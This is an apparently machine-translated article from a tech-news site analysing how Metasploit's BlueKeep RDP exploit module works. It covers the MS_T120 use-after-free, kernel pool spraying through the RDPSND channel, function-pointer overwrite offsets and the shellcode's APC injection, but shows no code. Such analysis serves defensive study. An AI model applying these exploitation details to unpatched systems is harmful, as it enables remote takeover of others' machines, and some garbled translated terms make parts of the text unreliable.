Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you a brief analysis of how to exploit Metasploit BlueKeep vulnerabilities. The article is rich in content and analyzed and described from a professional point of view. I hope you can get something after reading this article.

* solemnly declare: this article is limited to technical discussion and sharing, and is strictly prohibited to be used in illegal channels.

On Sept. 7, Metasploit released a BlueKeep remote Desktop command execution exploit module and an analysis blog. The tool is suitable for 64-bit Win7 system and open 64-bit 2008 system with desktop audio playback function. This paper will briefly analyze the utilization module with the related implementation of rdp.

Loophole principle

BlueKeep is a Use After Free vulnerability. A vulnerable remote desktop server releases a control structure of the internal channel MS_T120 when it receives a special packet, but does not delete the pointer to the structure, and calls a function pointer in the MS_T120 structure after the remote desktop connection finishes. If the attacker can re-occupy the released MS_T120 by sending data remotely, and assign the appropriate value to the function pointer in the structure body. Remote command execution can be realized. For a detailed analysis of vulnerabilities, please see the relevant contents of the Snow Security Summit lecture, the analysis of security researcher Hutchins and the write-up of github user 0xeb-bp.

Metasploit BlueKeep module utilization process

The analysis is based on cve_2019_0708_bluekeep_rce.rb file. After the module is started, the target is scanned for BlueKeep vulnerabilities (scanning principle). If there are vulnerabilities, the vulnerability exploitation process begins. The rdp connection is established and two virtual channels, MS_T120 (trigger vulnerability) and RDPSND (kernel pool injection), are registered. The wiresharkRDPDR channel shakes hands with the client after the rdp connection is established, and the relevant protocols can be found in the Microsoft documentation. After receiving the CLIENTID_CONFIRM message from the RDPDR channel, the program assumes that the rdp connection has been established and proceeds to the next exploit step.

First introduce the MS_T120 structure and the use of RDPSND to allocate data in the kernel non-paging pool. The MS_T120 structure is assigned by the rdp component termdd.sys to control the virtual channel MS_T120 in the rdp connection. The definition of this kind of structure is disclosed in a Microsoft rdp driver development document, although most of the field names are retained, but combined with termdd.sys, the meaning of the data representation can be analyzed.

The channel control structure is created and the memory space is allocated in the termddmemory IcaAllocateChannel. You can see that the allocated memory is in the kernel non-paging pool and the size is 0x160 bytes. You need to allocate a large amount of controllable data of the same size in the kernel non-paging pool before you can reoccupy and control the values of the key fields after the MS_T120 is released. This requires the use of rdp protocol for kernel pool injection (Pool Spray) (of course, non-rdp pool spray can also achieve the same purpose. BlueKeep uses zerosum0x0, the main contributor to the module, to share a BlueKeep Exp for pool spray using SMBLoris and IP shards, but requiring the target to enable additional services undoubtedly increases the vulnerability exploitation conditions. ). This can be achieved by sending data to a special virtual channel (see here for the virtual channel packet format document). The IcaChannelInputInternal in termdd.sys is also used to process the data sent to the virtual channel. After receiving the data, the IcaChannelInputInternal will perform different operations according to the state of the virtual channel. The key code is as follows:

Note the judgment in line 154 that IrpList is a linked list of queued Irp read requests in the virtual channel structure. If the linked list is not empty, IcaChannelInputInternal fetches an Irp and copies the received data, and the data is not allocated in the kernel non-paging pool. If the linked list is empty, IcaChannelInputInternal caches the received data in the kernel non-paging pool, and pool injection can be performed at this time, as shown below:

You can see that the received data is completely stored in the kernel non-paging pool, but it should be noted that an uncontrollable area with more 0x38 bytes than the data is allocated. This part is used to store metadata such as the length, location, front and back cache blocks of the cached data. Metasploit BlueKeep uses the RDPSND virtual channel selected by the module to meet the requirement that the IrpList linked list is empty, which can be verified by kernel debugging.

However, the RDPSND channel is used to perform remote desktop audio playback related functions, and if this function is disabled, the RDPSND will be turned off before the rdp connection is established. Remote desktop audio playback is enabled by default on the Win7 system and disabled by default on the 2008 system. It can only be enabled by configuring the relevant options through the remote desktop session host (or through the registry).

Sending Size-sized byte data to the RDPSND channel is stored in a Size+0x38-sized kernel non-paging pool, which can be used to occupy the freed MS_T120 structure and write shellcode. It is calculated that the data of 0x128 needs to be sent, so that the data of 0x160 size is allocated in the kernel non-paging pool, which is the same size as the MS_T120 structure. Metasploit BlueKeep uses the module to send a large amount of data of the size of 0x128, which takes up a lot of 0x160 bytes of memory space in the kernel non-paging pool, then sends packets that trigger MS_T120 release, and then sends data of the size of 0x128 again. Since a large amount of 0x160-sized space has been occupied in the kernel, the 0x160 byte memory space originally occupied by the newly released MS_T120 structure is very likely to be occupied by one of these newly sent data.

After successfully occupying the released MS_T120 structure, the module continues to write a large number of shellcode to the kernel using RDPSND.

Finally, BlueKeep uses the module to disconnect the rdp connection and trigger the shellcode execution.

This step is not absolutely stable. After controlling the MS_T120 structure, the module sets the function pointer in the structure body (offset 0x100) to the value in the non-paging pool address range of the kernel (refer to the Windows x64 kernel virtual address space layout), and expects that the shellcode written to the kernel can occupy this value. If it is successfully occupied, the remote command execution can be triggered smoothly, and if it cannot be occupied, it will cause the target blue screen to crash. The Metasploit BlueKeep exploiting module presets different addresses for different scenarios, which can be selected through the target option before exploiting the vulnerability.

If the vulnerability is successfully exploited, shellcode execution is triggered at termddflooding IcaChannelInputInternalForm17d.

Because the trigger point of the vulnerability is in termdd.sys, the IRQL is DISPATCH_LEVEL when shellcode is executed, so special processing is required. The implementation logic of BlueKeep using the shellcode of the module is basically the same as that of Eternal Blue, which is first hook syscall and then APC injection to complete the transfer from R0 to R3. The difference is that BlueKeep searches and replicates the user-mode payload by egg hunter during the operation of the shellcode (for the consideration of the limited data size of a single transmission in the virtual channel), while the offset position of the eternal blue user-mode payload is fixed. BlueKeep

EternalBlue

And in order to avoid the trouble of returning to the IcaChannelInputInternal function, the shellcode of BlueKeep chooses to return to the upper function of IcaChannelInputInternal directly after hook syscall.

This part of the code is consistent with the end-of-IcaChannelInputInternal return function.

However, this also causes a small problem. IcaChannelInputInternal has previously acquired the synchronization lock in the channel structure, where the IcaChannelInputInternal is directly exited and the lock is not released.

The above is a brief analysis of how to exploit Metasploit BlueKeep vulnerabilities shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.